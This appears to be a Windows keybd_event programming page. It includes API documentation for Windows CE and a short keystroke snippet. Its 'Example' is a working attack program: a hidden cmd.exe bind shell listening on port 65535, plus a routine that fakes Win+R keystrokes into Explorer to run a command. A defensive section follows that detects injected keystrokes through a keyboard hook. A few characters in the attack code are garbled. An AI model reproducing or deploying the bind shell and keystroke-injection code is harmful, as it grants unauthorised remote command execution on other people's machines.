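1. Defining keys on Windows CE
You can write your own key driver. It is simple: whenever a key event occurs, call the keybd_event function.
For example, to define a left-arrow key:
When the key is pressed:
keybd_event(VK_LEFT, 0x25, KEYEVENTF_SILENT, 0);
When the key is released:
keybd_event(VK_LEFT, 0x25, KEYEVENTF_SILENT | KEYEVENTF_KEYUP, 0);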
------------------------------------------------------------------------------------------------------------------------------
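Detailed usage:
Function: keybd_event synthesizes a keystroke event. The system can use such a synthesized keystroke to generate a WM_KEYUP or WM_KEYDOWN message. The keyboard driver's interrupt handler calls keybd_event. On Windows NT this function has been superseded by SendInput.
Prototype: VOID keybd_event(BYTE bVk, BYTE bScan, DWORD dwFlags, DWORD dwExtraInfo);
Parameters:
bVk: Specifies a virtual-key code. The value must be in the range 1 to 254.
bScan: Specifies the hardware scan code for the key.
dwFlags: A set of flag bits that specify various aspects of the function's operation. An application can set them using a combination of the following predefined constants.
KEYEVENTF_EXTENDEDKEY: If specified, the scan code is preceded by a prefix byte with the value 0xE0 (224).
KEYEVENTF_KEYUP: If specified, the key is being released; if not specified, the key is being pressed.
dwExtraInfo: Specifies an additional 32-bit value associated with the keystroke.
Return value: This function does not return a value.
Remarks: Although keybd_event passes an OEM-dependent hardware scan code to the system, applications should not use the scan code. The system converts the scan code to a virtual-key code internally and clears the up/down bit of the key code before passing it to applications. An application can simulate a press of the PRINTSCREEN key to obtain a screen snapshot and place it on the clipboard. To do this, set the bVk parameter of keybd_event to VK_SNAPSHOT and the bScan parameter to 0 (for a full-screen snapshot) or to 1 (for a snapshot of the active window only). Windows CE: Windows CE supports an additional flag for the dwFlags parameter: use the KEYEVENTF_SILENT flag to simulate a keystroke without producing the key-click sound. Windows CE does not support the KEYEVENTF_EXTENDEDKEY flag.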
-------------------------------------------------------------------------------------------------------------------------------
case 6: // simulate a keyboard keystroke
{
WORD Key = 65; // virtual-key code 65 is the 'A' key
sRecvString = AnsiString(Key);
int strCusKey = StrToInt(sRecvString);
keybd_event(strCusKey, 0, 0, 0); // press the key
keybd_event(strCusKey, 0, KEYEVENTF_KEYUP, 0); // release the key
}
break;
-------------------------------------------------------------------------------------------------------------------------------
Example:
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define HAXORCITOS 65535
unsigned int pid = 0;
char buf[256]="";
/**************************************************************/
void ExplorerExecution (HWND hwnd, LPARAM lParam){
DWORD hwndid;
int i;
GetWindowThreadProcessId(hwnd,&hwndid);
if (hwndid == pid){
/*
Replace keybd_event with SendMessage() and PostMessage() calls
*/
printf("HANDLE Found. Attacking =)\n");
SetForegroundWindow(hwnd);
keybd_event(VK_LWIN,1,0,0);
keybd_event(VkKeyScan('r'),1,0,0);
keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
for(i=0;i<strlen(buf);i++) {
if (buf[i]==':') {
keybd_event(VK_SHIFT,1,0,0);
keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
} else {
if (buf[i]=='\\') {
keybd_event(VK_LMENU,1,0,0);
keybd_event(VK_CONTROL,1,0,0);
keybd_event(VkKeyScan('�'),1,0,0);
keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0);
keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('�'),1,KEYEVENTF_KEYUP,0);
} else {
keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
}
}
}
keybd_event(VK_RETURN,1,0,0);
keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0);
exit(1);
}
}
/**************************************************************/
int BindShell(void) { //Bind Shell. POrt 65535
SOCKET s,s2;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSADATA HWSAdata;
struct sockaddr_in sa;
int len;
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); }
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(HAXORCITOS);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
len=sizeof(sa);
if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); }
if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }
s2 = accept(s,(struct sockaddr *)&sa,&len);
closesocket(s);
ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) );
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = (void *) s2; // SOCKET
si.hStdOutput = (void *) s2;
si.hStdError = (void *) s2;
if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) {
doFormatMessage(GetLastError());
return(-1);
}
WaitForSingleObject( pi.hProcess, INFINITE );
closesocket(s);
closesocket(s2);
printf("SALIMOS...\n");
Sleep(5000);
return(1);
}
/**************************************************************/
void main(int argc, char* argv[])
{
HWND console_wnd = NULL;
if (argc >= 2) {
pid = atoi (argv[1]);
strncpy(buf,argv[0],sizeof(buf)-1);
EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));
} else {
BindShell();
}
}
/**************************************************************/
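A defender's view of the Win+R sequence in the listing above, as an added example that is not part of the original page: keystrokes produced by keybd_event reach a WH_KEYBOARD_LL hook with LLKHF_INJECTED set, so a monitor can tell a synthetic Run-dialog chord from a typed one. The key_rec struct, the function name and the sample streams are assumptions constructed for illustration; the constant values are those of the Windows SDK.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Values from the Windows SDK (winuser.h), redefined so the logic builds anywhere. */
#ifndef LLKHF_INJECTED
#define LLKHF_INJECTED 0x10u /* set for keybd_event/SendInput events */
#define LLKHF_UP       0x80u /* key release */
#endif
#ifndef VK_LWIN
#define VK_LWIN 0x5B
#endif
#define VK_R 0x52 /* virtual-key code of the 'R' key */

/* Hypothetical record: the vkCode and flags fields of the KBDLLHOOKSTRUCT
   that a WH_KEYBOARD_LL hook procedure receives for every key event. */
struct key_rec { uint32_t vk; uint32_t flags; };

/* Index of the first Win+R chord in which either key was injected, or -1.
   A chord typed on the physical keyboard is not reported. */
int find_injected_run_dialog(const struct key_rec *ev, size_t n)
{
    int win_down = 0, win_injected = 0;
    for (size_t i = 0; i < n; i++) {
        int up  = (ev[i].flags & LLKHF_UP) != 0;
        int inj = (ev[i].flags & LLKHF_INJECTED) != 0;
        if (ev[i].vk == VK_LWIN) {          /* track the modifier state */
            win_down = !up;
            win_injected = !up && inj;
        } else if (ev[i].vk == VK_R && !up && win_down && (inj || win_injected)) {
            return (int)i;
        }
    }
    return -1;
}

/* Constructed sample streams, not captured from a real system. */
static const struct key_rec injected_stream[] = {
    {0x41, 0}, {0x41, LLKHF_UP},                         /* user types 'A' */
    {VK_LWIN, LLKHF_INJECTED}, {VK_R, LLKHF_INJECTED},   /* synthetic Win+R */
    {VK_LWIN, LLKHF_INJECTED | LLKHF_UP}, {VK_R, LLKHF_INJECTED | LLKHF_UP},
};
static const struct key_rec typed_stream[] = {
    {VK_LWIN, 0}, {VK_R, 0}, {VK_R, LLKHF_UP}, {VK_LWIN, LLKHF_UP},
};

int main(void)
{
    printf("injected stream: %d\n", find_injected_run_dialog(injected_stream, 6));
    printf("typed stream:    %d\n", find_injected_run_dialog(typed_stream, 4));
    return 0;
}
```

In a real hook procedure the same test would run on each KBDLLHOOKSTRUCT as it arrives; legitimate automation and accessibility tools also inject input, so a hit is a signal to correlate with the foreground process rather than a verdict.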
keybd_event(VK_F1, MapVirtualKey(VK_F1, 0), 0, 0);
keybd_event(VK_F1, MapVirtualKey(VK_F1, 0), KEYEVENTF_KEYUP, 0);